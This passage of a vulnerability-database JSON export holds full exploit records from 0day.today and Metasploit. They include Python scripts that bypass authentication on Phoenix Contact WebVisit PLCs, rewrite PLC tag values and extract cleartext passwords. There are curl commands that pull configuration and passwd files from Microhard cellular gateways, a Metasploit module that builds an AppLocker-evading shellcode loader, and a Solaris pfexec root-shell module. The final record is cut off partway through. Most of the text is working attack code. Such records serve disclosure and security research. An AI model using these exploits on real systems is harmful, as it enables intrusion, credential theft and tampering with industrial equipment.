*/\r\n 211 }\r\n 212 p++;\r\n 213 }\r\n 214 return (int)len;\r\n 215 }\r\n \r\nProof of discovery:\r\n \r\n $ echo -n \"AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==\" | base64 -d | sha256sum\r\n 5bba9f9410bd4dffa4dc119477153002002db3fdd26a97080e43bfd95aeadb24 -\r\n \r\ntwitter.com/magnusstubman/status/938317849474555904\r\n \r\nPatch: sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a \r\n \r\nREFERENCES\r\n==========\r\n \r\n- sourceforge.net/p/openslp/bugs/161\r\n- sourceforge.net/p/openslp/bugs/160\r\n- twitter.com/magnusstubman/status/938317849474555904\r\n- twitter.com/magnusstubman/status/953909628622069760\r\n- sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a\r\n- openwall.com/lists/oss-security/2016/09/27/4\r\n- openwall.com/lists/oss-security/2016/09/28/1\n\n# 0day.today [2018-11-12] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/31559"}, {"lastseen": "2018-10-13T22:49:43", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category web applications", "modified": "2018-10-12T00:00:00", "published": "2018-10-12T00:00:00", "id": "1337DAY-ID-31316", "href": "https://0day.today/exploit/description/31316", "title": "Phoenix Contact WebVisit 2985725 - Authentication Bypass Exploit", "type": "zdt", "sourceData": "# Exploit Title: Phoenix Contact WebVisit 2985725 - Authentication Bypass\r\n# Date: 2018-09-30\r\n# Exploit Author: Deneut Tijl\r\n# Vendor Homepage: www.phoenixcontact.com\r\n# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5\r\n# Version: WebVisit (all 
versions)\r\n# CVE : CVE-2016-8380, CVE-2016-8371\r\n \r\n# Description\r\n# Script to read and write PLC tags via a Webvisit HMI page (even in case of a password protection)\r\n# Steps:\r\n# * Get Project Name: http://<ip>/\r\n# * Get list of tags: http://<ip>/<projectname>.tcr\r\n# * Get current values of tags: http://<ip>/cgi-bin/ILRReadValues.exe\r\n# * Set new tag values: http://<ip>/cgi-bin/writeVal.exe?<tag>+<value> (urlencode!)\r\n \r\n# CVE-2016-8380-SetPLCValues.py\r\n \r\n#! /usr/bin/env python\r\n \r\nimport urllib2\r\n \r\nstrIP = raw_input('Please enter an IP [192.168.1.200]: ')\r\nif strIP == '': strIP = '192.168.1.200'\r\n \r\ntry:\r\n URLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/'))\r\nexcept urllib2.HTTPError:\r\n print('#### Critical Error with IP ' + strIP + ': no response')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n \r\nstrProject = ''\r\nfor line in URLResponse.readlines():\r\n if 'ProjectName' in line:\r\n strProject = line.split('VALUE=\"')[1].split('\"')[0]\r\n \r\nif strProject == '':\r\n print('#### Error, no \\'ProjectName\\' found on the main page')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n \r\nprint('---- Found project \\'' + strProject + '\\', retrieving list of tags')\r\n \r\ntry:\r\n TagResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strProject + '.tcr'))\r\nexcept urllib2.HTTPError:\r\n print('#### Critical Error with IP ' + strIP + ': /' + strProject + '.tcr not found')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n \r\narrTagList = []\r\nfor line in TagResponse.readlines():\r\n if line.startswith('#!-- N ='):\r\n intNumberOfTags = int(line.split('=')[1])\r\n print('---- There should be ' + str(intNumberOfTags) + ' tags:')\r\n if not line.startswith('#'):\r\n if not line.split(';')[0].strip() == '':\r\n arrTagList.append(line.split(';')[0].strip())\r\n print('-- '+line.split(';')[0].strip())\r\n \r\n \r\nraw_input('Press Enter to query them all')\r\nimport os, 
urllib\r\nos.system('cls' if os.name == 'nt' else 'clear')\r\nstrPost = '<body>'\r\nstrPost += '<item_list_size>' + str(len(arrTagList)) + '</item_list_size>'\r\nstrPost += '<item_list>'\r\nfor item in arrTagList:\r\n strPost += '<i><n>' + item + '</n></i>'\r\nstrPost += '</item_list></body>'\r\nDataResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/ILRReadValues.exe', strPost)).read()\r\n \r\narrData = []\r\nfor item in DataResponse.split('<i>'):\r\n if '<n>' in item:\r\n name = item.split('<n>')[1].split('</n>')[0]\r\n value = item.split('<v>')[1].split('</v>')[0]\r\n arrData.append((name,value))\r\nprint('----- Full list of tags and their values:')\r\ni = 0\r\nfor item in arrData:\r\n i += 1\r\n print(str(i) + ': Tag ' + item[0] + ' has value: ' + item[1])\r\n \r\nans1 = raw_input('Want to change a tag? Enter a number or press Enter to quit: ')\r\nif ans1 == '':\r\n exit()\r\nstrTag = arrData[int(ans1) - 1][0]\r\nstrVal = arrData[int(ans1) - 1][1]\r\nans2 = raw_input('Setting value for ' + strTag + ' [' + strVal + ']: ')\r\nif ans2 == '': ans2 = strVal\r\nurllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/writeVal.exe?' 
+ urllib.quote_plus(strTag) + '+' + str(ans2)))\n\n# 0day.today [2018-10-13] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/31316"}, {"lastseen": "2018-10-11T18:54:19", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2018-10-11T00:00:00", "published": "2018-10-11T00:00:00", "id": "1337DAY-ID-31303", "href": "https://0day.today/exploit/description/31303", "title": "Phoenix Contact WebVisit 6.40.00 - Password Disclosure Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Phoenix Contact WebVisit 6.40.00 - Password Disclosure\r\n# Exploit Author: Deneut Tijl\r\n# Vendor Homepage: www.phoenixcontact.com\r\n# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5\r\n# Version: WebVisit < 6.40.00\r\n# CVE: CVE-2016-8366\r\n \r\n# This script will perform retrieval of clear text credentials for a Phoenix Contact PLC with a WebVisit GUI, \r\n# password protected, application on it Tested on the Phoenix Contact ILC-390 PLC, but others are \r\n# surely equally vulnerable with WebVisit 6.40.00, the passwords are SHA256 hashes, which also will be retrieved\r\n \r\n# Sample output:\r\n# C:\\Users\\admin\\Desktop>CVE-2016-8366.py\r\n# Please enter an IP [192.168.1.200]:\r\n# This is the password for userlevel 1: pw1\r\n# This is the password for userlevel 2: SuperPass2\r\n# This is the password for userlevel 3: Extreme2TheMax3\r\n# This is the password for userlevel 4: PowerPass4\r\n# Press Enter to exit\r\n \r\n# PoC\r\n \r\n#! 
/usr/bin/env python\r\n \r\nimport urllib2, binascii\r\n \r\nstrIP = raw_input('Please enter an IP [192.168.1.200]: ')\r\nif strIP == '': strIP = '192.168.1.200'\r\n \r\ntry:\r\n URLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/'))\r\nexcept urllib2.HTTPError:\r\n print('#### Critical Error with IP ' + strIP + ': no response')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n \r\nstrMainTEQ = ''\r\nfor line in URLResponse.readlines():\r\n if 'MainTEQName' in line:\r\n strMainTEQ = line.split('VALUE=\"')[1].split('\"')[0]\r\n \r\nif strMainTEQ == '':\r\n print('#### Error, no \\'MainTEQ\\' found on the main page')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n \r\ntry:\r\n LoginTeqResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strMainTEQ))\r\nexcept urllib2.HTTPError:\r\n print('Critical Error with IP ' + strIP + ': File \\'' + strMainTEQ + '\\' not found')\r\n raw_input('Press Enter to exit')\r\n exit()\r\nstrAlldata = ''\r\nfor line in LoginTeqResponse.readlines():\r\n strAlldata += binascii.hexlify(line)\r\n \r\n## For vulnerable webvisit:\r\n## Seems to be 'userLevel' + x bytes + 1 + y bytes + 'password'\r\n## userLevel + '0506030001' + 31 + '00030003010301068300' + passlength + 'password'\r\n## For WebVisit > 6.40.00\r\n## userLevel + '0003000301030b06830040' + 'SHA256' (wich is 64 bytes)\r\n \r\narrData = strAlldata.split('757365724c6576656c0506030001') ## userLevel + '0506030001'\r\nfor item in arrData:\r\n if '00030003010301068300' in item:\r\n intUserlevel = int(binascii.unhexlify(item[:2]), 16) ## Turn str '31' into int 1\r\n strPassLength = item.split('00030003010301068300')[1][:2]\r\n strPassword = binascii.unhexlify(item.split('00030003010301068300')[1][2:2+(2*int(strPassLength,16))])\r\n print('This is the password for userlevel ' + str(intUserlevel) + ': ' + strPassword)\r\n elif '0003000301030b06830040' in item:\r\n intUserlevel = int(binascii.unhexlify(item[:2]), 16)\r\n strHash = 
binascii.unhexlify(item.split('0003000301030b06830040')[1][:64*2])\r\n print('This is the hash for userlevel ' + str(intUserlevel) + ': ' + strHash.lower())\r\nraw_input('Press Enter to exit')\n\n# 0day.today [2018-10-11] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/31303"}, {"lastseen": "2018-07-17T20:05:49", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "1337DAY-ID-30738", "href": "https://0day.today/exploit/description/30738", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download Vulnerability", "type": "zdt", "sourceData": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Configuration Download\r\n \r\n \r\nVendor: Microhard Systems Inc.\r\nProduct web page: http://www.microhardcorp.com\r\nAffected version: IPn4G 1.1.0 build 1098\r\n IPn3Gb 2.2.0 build 2160\r\n IPn4Gb 1.1.6 build 1184-14\r\n IPn4Gb 1.1.0 Rev 2 build 1090-2\r\n IPn4Gb 1.1.0 Rev 2 build 1086\r\n Bullet-3G 1.2.0 Rev A build 1032\r\n VIP4Gb 1.1.6 build 1204\r\n VIP4G 1.1.6 Rev 3.0 build 1184-14\r\n VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196\r\n IPn3Gii / Bullet-3G 1.2.0 build 1076\r\n IPn4Gii / Bullet-LTE 1.2.0 build 1078\r\n BulletPlus 1.3.0 build 1036\r\n Dragon-LTE 1.1.0 build 1036\r\n \r\nSummary: The new IPn4Gb provides a rugged, industrial strength wireless solution\r\nusing the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb\r\nfeatures integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control\r\nLists. 
The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial\r\nRS232/485/422 devices!\r\n \r\nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses\r\nthe widespread deployment of cellular network infrastructure for critical data collection.\r\nFrom remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!\r\nThe IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It\r\nprovides robust and secure wireless communication of Serial, USB and Ethernet data.\r\n \r\nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength\r\nwireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things\r\nto the next level by providing features such as Ethernet with PoE, RS232 Serial port\r\nand 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated\r\nFirewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution\r\nworth looking at!\r\n \r\nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength\r\nwireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote\r\ncellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight\r\nsystem integration and design flexibility with dual Ethernet Ports and high power\r\n802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access\r\nControl Lists, the Dragon-LTE provides a solution for any cellular application!\r\n \r\nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE\r\nnetwork infrastructure for critical data communications. The VIP4Gb provides simultaneous\r\nnetwork connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital\r\nI/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in\r\nany application! 
The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.\r\nIt provides robust and secure wireless communication of Serial, Ethernet & WiFi data.\r\n \r\nDesc: The system backup configuration file 'IPn4G.config' in '/' directory or its respective\r\nname based on the model name including the similar files in '/www/cgi-bin/system.conf', '/tmp'\r\nand the cli.conf in '/etc/m_cli/' can be downloaded by an authenticated attacker in certain\r\ncircumstances. This will enable the attacker to disclose sensitive information and help her\r\nin authentication bypass, privilege escalation and/or full system access.\r\n \r\nTested on: httpd-ssl-1.0.0\r\n Linux 2.6.32.9 ([email\u00a0protected]) (gcc version 4.4.3)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2018-5484\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5484.php\r\n \r\n \r\n13.03.2018\r\n \r\n--\r\n \r\n \r\n/etc/m_cli/cli.conf:\r\n--------------------\r\n \r\ncurl \"http://192.168.1.1/cgi-bin/webif/download.sh?script=/cgi-bin/webif/system-editor.sh&path=/etc/m_cli&savefile=cli.conf\" -H \"Authorization: Basic YWRtaW46YWRtaW4=\" |grep passwd\r\n % Total % Received % Xferd Average Speed Time Time Time Current\r\n Dload Upload Total Spent Left Speed\r\n100 2719 100 2719 0 0 2574 0 0:00:01 0:00:01 --:--:-- 2577\r\npasswd admin \r\n \r\n \r\n/www/IPn4G.config:\r\n------------------\r\n \r\n[email\u00a0protected]:~$ curl http://192.168.1.1/IPn4G.config -o IPn4G.tar.gz -H \"Authorization: Basic YWRtaW46YWRtaW4=\"\r\n % Total % Received % Xferd Average Speed Time Time Time Current\r\n Dload Upload Total Spent Left Speed\r\n100 13156 100 13156 0 0 9510 0 0:00:01 0:00:01 --:--:-- 9512\r\n[email\u00a0protected]:~$ tar -zxf IPn4G.tar.gz ; ls\r\nconfig.boardinfo config.boardtype config.date config.name etc IPn4G.tar.gz usr\r\n[email\u00a0protected]:~$ cat config.boardinfo config.boardtype config.date config.name 
\r\n2012 Microhard Systems Inc.:IPn4Gb-IPn4G:v1.0.0\r\nAtheros AR7130 rev 2\r\nThu Jul 12 12:42:42 PDT 2018\r\nIPn4G\r\n[email\u00a0protected]:~$ cat usr/lib/hardware_desc \r\nmodem_type=\"N930\"\r\nLTE_ATCOMMAND_PORT=\"/dev/ttyACM0\"\r\nLTE_DIAG_PORT=\"\"\r\nLTE_GPS_PORT=\"\"\r\nwificard = \"0\"\r\n[email\u00a0protected]:~$ ls etc/\r\nconfig crontabs dropbear ethers firewall.user hosts httpd.conf passwd ssl\r\n[email\u00a0protected]:~$ ls etc/config/\r\ncomport dhcp gpsgatetr iperf modbusd notes sdpServer twatchdog webif_access_control\r\ncomport2 dropbear gpsr ipsec msmscomd ntpclient snmpd updatedd websockserver\r\ncoova-chilli ethernet gpsrecorderd keepalive msshc ntrd snmpd.conf vlan wireless\r\ncron eurd gre-tunnels localmonitor network pimd system vnstat wsclient\r\ncrontabs firewall httpd lte network_IPnVTn3G ping timezone vpnc\r\ndatausemonitor gpsd ioports lte362 network_VIP4G salertd tmpstatus webif\r\n[email\u00a0protected]:~$ cat etc/passwd \r\nroot:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/:0:0:root:/:/bin/ash\r\nadmin:$1$0VKXa1iD$.Jw20V3iH3kx6VSLjsFZP.:0:0:admin:/:/etc/m_cli/m_cli.sh\r\nupgrade:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:500:500:ftpupgrade:/upgrade/upgrade:/bin/false\r\nat:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/:0:0:admin:/:/bin/atUI\r\nnobody:*:65534:65534:nobody:/var:/bin/false\r\ntestlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.:0:0:Linux User,,,:/:/etc/testlab.sh\r\ntestlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0:0:0:Linux User,,,:/:/etc/m_cli/m_cli.sh\r\ntestingus:$1$S9c8yiFq$P96OckXNQMhpKjFoRx1sL.:1000:1000:Linux User,,,:/home/testingus:/bin/false\r\nmsshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh\r\n \r\n \r\n/www/cgi-bin/system.conf:\r\n-------------------------\r\n \r\n[email\u00a0protected]:~$ curl -O http://192.168.1.1/cgi-bin/system.conf -H \"Authorization: Basic YWRtaW46YWRtaW4=\"\r\n[email\u00a0protected]:~$ cat system.conf |grep -irnH \"password\" -A2\r\nsystem.conf:236:#VPN Admin 
Password:\r\nsystem.conf-237-NetWork_IP_VPN_Passwd=admin\r\nsystem.conf-238-\r\n--\r\nsystem.conf:309:#V3 Authentication Password:\r\nsystem.conf:310:NetWork_SNMP_V3_Auth_Password=00000000\r\nsystem.conf-311-\r\nsystem.conf:312:#V3 Privacy Password:\r\nsystem.conf:313:NetWork_SNMP_V3_Privacy_Password=00000000\r\n \r\n \r\nLogin to FTP (upgrade:admin). In /tmp/ or /tmp/upgrade/ the system.conf (gzipped) is located.\r\n---------------------------------------------------------------------------------------------\n\n# 0day.today [2018-07-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30738"}], "metasploit": [{"lastseen": "2019-11-28T22:57:19", "bulletinFamily": "exploit", "description": "This module will assist you in evading Microsoft Windows Applocker and Software Restriction Policies. This technique utilises the Microsoft signed binary PresentationHost.exe to execute user supplied code.\n", "modified": "2019-08-03T09:41:13", "published": "2019-08-01T07:40:30", "id": "MSF:EVASION/WINDOWS/APPLOCKER_EVASION_PRESENTATIONHOST", "href": "", "type": "metasploit", "title": "Applocker Evasion - Windows Presentation Foundation Host", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Evasion\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Applocker Evasion - Windows Presentation Foundation Host',\n 'Description' => %(\n This module will assist you in evading Microsoft\n Windows Applocker and Software Restriction Policies.\n This technique utilises the Microsoft signed binary\n PresentationHost.exe to execute user supplied code.\n ),\n 'Author' =>\n [\n 'Nick Tyrer <@NickTyrer>', # module development\n 'Casey Smith' # presentationhost bypass research\n ],\n 'License' => 'MSF_LICENSE',\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86],\n 'Targets' => [['Microsoft Windows', {}]])\n 
)\n\n register_options(\n [\n OptString.new('CS_FILE', [true, 'Filename for the .xaml.cs file (default: presentationhost.xaml.cs)', 'presentationhost.xaml.cs']),\n OptString.new('MANIFEST_FILE', [true, 'Filename for the .manifest file (default: presentationhost.manifest)', 'presentationhost.manifest']),\n OptString.new('CSPROJ_FILE', [true, 'Filename for the .csproj file (default: presentationhost.csproj)', 'presentationhost.csproj'])\n ]\n )\n\n deregister_options('FILENAME')\n end\n\n def build_payload\n Rex::Text.encode_base64(payload.encoded)\n end\n\n def obfu\n Rex::Text.rand_text_alpha 8\n end\n\n def presentationhost_xaml_cs\n esc = build_payload\n mod = [obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu]\n <<~HEREDOC\n using System;\n class #{mod[0]}{\n static void Main(string[] args){\n IntPtr #{mod[1]};\n #{mod[1]} = GetConsoleWindow();\n ShowWindow(#{mod[1]}, #{mod[2]});\n string #{mod[3]} = \"#{esc}\";\n byte[] #{mod[4]} = Convert.FromBase64String(#{mod[3]});\n byte[] #{mod[5]} = #{mod[4]};\n IntPtr #{mod[6]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[5]}.Length, #{mod[7]}, #{mod[8]});\n System.Runtime.InteropServices.Marshal.Copy(#{mod[5]}, 0, #{mod[6]}, #{mod[5]}.Length);\n IntPtr #{mod[9]} = IntPtr.Zero;\n WaitForSingleObject(CreateThread(#{mod[9]}, UIntPtr.Zero, #{mod[6]}, #{mod[9]}, 0, ref #{mod[9]}), #{mod[10]});}\n private static Int32 #{mod[7]}=0x1000;\n private static IntPtr #{mod[8]}=(IntPtr)0x40;\n private static UInt32 #{mod[10]} = 0xFFFFFFFF;\n [System.Runtime.InteropServices.DllImport(\"kernel32\")]\n private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);\n [System.Runtime.InteropServices.DllImport(\"kernel32\")]\n private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);\n [System.Runtime.InteropServices.DllImport(\"kernel32\")]\n private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);\n 
[System.Runtime.InteropServices.DllImport(\"user32.dll\")]\n static extern bool ShowWindow(IntPtr #{mod[1]}, int nCmdShow);\n [System.Runtime.InteropServices.DllImport(\"Kernel32\")]\n private static extern IntPtr GetConsoleWindow();\n const int #{mod[2]} = 0;}\n HEREDOC\n end\n\n def presentationhost_manifest\n <<~HEREDOC\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <assembly manifestVersion=\"1.0\" xmlns=\"urn:schemas-microsoft-com:asm.v1\">\n <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\" />\n <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">\n <security>\n <applicationRequestMinimum>\n <defaultAssemblyRequest permissionSetReference=\"Custom\" />\n <PermissionSet class=\"System.Security.PermissionSet\" version=\"1\" ID=\"Custom\" SameSite=\"site\" Unrestricted=\"true\" />\n </applicationRequestMinimum>\n <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">\n <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\" />\n </requestedPrivileges>\n </security>\n </trustInfo>\n </assembly>\n HEREDOC\n end\n\n def presentationhost_csproj\n <<~HEREDOC\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n <Import Project=\"$(MSBuildExtensionsPath)\\\\$(MSBuildToolsVersion)\\\\Microsoft.Common.props\" Condition=\"Exists('$(MSBuildExtensionsPath)\\\\$(MSBuildToolsVersion)\\\\Microsoft.Common.props')\" />\n <PropertyGroup>\n <Configuration Condition=\" '$(Configuration)' == '' \">Release</Configuration>\n <Platform Condition=\" '$(Platform)' == '' \">x86</Platform>\n <OutputType>WinExe</OutputType>\n <HostInBrowser>true</HostInBrowser>\n <GenerateManifests>true</GenerateManifests>\n <SignManifests>false</SignManifests>\n </PropertyGroup>\n <PropertyGroup Condition=\" '$(Configuration)|$(Platform)' == 'Release|x86' \">\n <Optimize>true</Optimize>\n <OutputPath>.</OutputPath>\n </PropertyGroup>\n <ItemGroup>\n <Reference Include=\"System\" />\n 
</ItemGroup>\n <ItemGroup>\n <Compile Include=\"#{datastore['CS_FILE']}\">\n <DependentUpon>#{datastore['CS_FILE']}</DependentUpon>\n <SubType>Code</SubType>\n </Compile>\n </ItemGroup>\n <ItemGroup>\n <None Include=\"#{datastore['MANIFEST_FILE']}\" />\n </ItemGroup>\n <Import Project=\"$(MSBuildToolsPath)\\\\Microsoft.CSharp.targets\" />\n </Project>\n HEREDOC\n end\n\n def file_format_filename(name = '')\n name.empty? ? @fname : @fname = name\n end\n\n def create_files\n f1 = datastore['CS_FILE'].empty? ? 'presentationhost.xaml.cs' : datastore['CS_FILE']\n f1 << '.xaml.cs' unless f1.downcase.end_with?('.xaml.cs')\n f2 = datastore['MANIFEST_FILE'].empty? ? 'presentationhost.manifest' : datastore['MANIFEST_FILE']\n f2 << '.manifest' unless f2.downcase.end_with?('.manifest')\n f3 = datastore['CSPROJ_FILE'].empty? ? 'presentationhost.csproj' : datastore['CSPROJ_FILE']\n f3 << '.csproj' unless f3.downcase.end_with?('.csproj')\n cs_file = presentationhost_xaml_cs\n manifest_file = presentationhost_manifest\n csproj_file = presentationhost_csproj\n file_format_filename(f1)\n file_create(cs_file)\n file_format_filename(f2)\n file_create(manifest_file)\n file_format_filename(f3)\n file_create(csproj_file)\n end\n\n def instructions\n print_status \"Copy #{datastore['CS_FILE']}, #{datastore['MANIFEST_FILE']} and #{datastore['CSPROJ_FILE']} to the target\"\n print_status \"Compile using: C:\\\\Windows\\\\Microsoft.Net\\\\Framework\\\\[.NET Version]\\\\MSBuild.exe #{datastore['CSPROJ_FILE']}\"\n print_status \"Execute using: C:\\\\Windows\\\\System32\\\\PresentationHost.exe [Full Path To] #{datastore['CS_FILE'].gsub('.xaml.cs', '.xbap')}\"\n end\n\n def run\n create_files\n instructions\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/evasion/windows/applocker_evasion_presentationhost.rb"}, {"lastseen": "2019-10-23T20:30:15", "bulletinFamily": "exploit", "description": "This module 
attempts to upgrade a shell session to UID 0 using pfexec.\n", "modified": "2019-02-01T22:58:21", "published": "2019-02-01T22:58:21", "id": "MSF:POST/SOLARIS/ESCALATE/PFEXEC", "href": "", "type": "metasploit", "title": "Solaris pfexec Upgrade Shell", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n include Msf::Post::Solaris::System\n include Msf::Post::Solaris::Priv\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Solaris pfexec Upgrade Shell',\n 'Description' => %q{\n This module attempts to upgrade a shell session to UID 0 using pfexec.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['bcoles'],\n 'Platform' => 'solaris',\n 'References' =>\n [\n ['URL', 'https://docs.oracle.com/cd/E19253-01/816-4557/prbactm-1/index.html'],\n ['URL', 'http://www.c0t0d0s0.org/archives/4844-Less-known-Solaris-features-pfexec.html'],\n ['URL', 'http://solaris.wikia.com/wiki/Providing_root_privileges_with_pfexec']\n ],\n 'SessionTypes' => ['shell']\n ))\n register_options [\n OptString.new('PFEXEC_PATH', [true, 'Path to pfexec', '/usr/bin/pfexec']),\n OptString.new('SHELL_PATH', [true, 'Path to shell', '/bin/sh'])\n ]\n end\n\n def shell_path\n datastore['SHELL_PATH'].to_s\n end\n\n def pfexec_path\n datastore['PFEXEC_PATH'].to_s\n end\n\n def run\n unless session.type == 'shell'\n fail_with Failure::BadConfig, \"This module is not compatible with #{session.type} sessions\"\n end\n\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n unless command_exists? pfexec_path\n fail_with Failure::NotVulnerable, \"#{pfexec_path} does not exist\"\n end\n\n user = cmd_exec('id -un').to_s\n\n print_status \"Trying pfexec as `#{user}' ...\"\n\n res = cmd_exec \"#{pfexec_path} #{shell_path} -c id\"\n vprint_status res\n\n unless res.include? 
'uid=0'\n fail_with Failure::NotVulnerable, \"User `#{user}' does not have permission to escalate with pfexec\"\n end\n\n print_good 'Success! Upgrading session ...'\n\n cmd_exec \"#{pfexec_path} #{shell_path}\"\n\n unless is_root?\n fail_with Failure::NotVulnerable, 'Failed to escalate'\n end\n\n print_good 'Success! root shell secured'\n report_note(\n :host => session,\n :type => 'host.escalation',\n :data => \"User `#{user}' pfexec'ed to a root shell\"\n )\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/solaris/escalate/pfexec.rb"}, {"lastseen": "2019-12-12T23:12:34", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below. The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters via Import from other File. This results in overwriting a structured exception handler record.\n", "modified": "2018-10-04T15:10:09", "published": "2018-09-29T11:59:14", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/ZAHIR_ENTERPRISE_PLUS_CSV", "href": "", "type": "metasploit", "title": "Zahir Enterprise Plus 6 Stack Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Seh\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Zahir Enterprise Plus 6 Stack Buffer Overflow\",\n 'Description' => %q{\n This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below.\n The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters\n via Import from other File. 
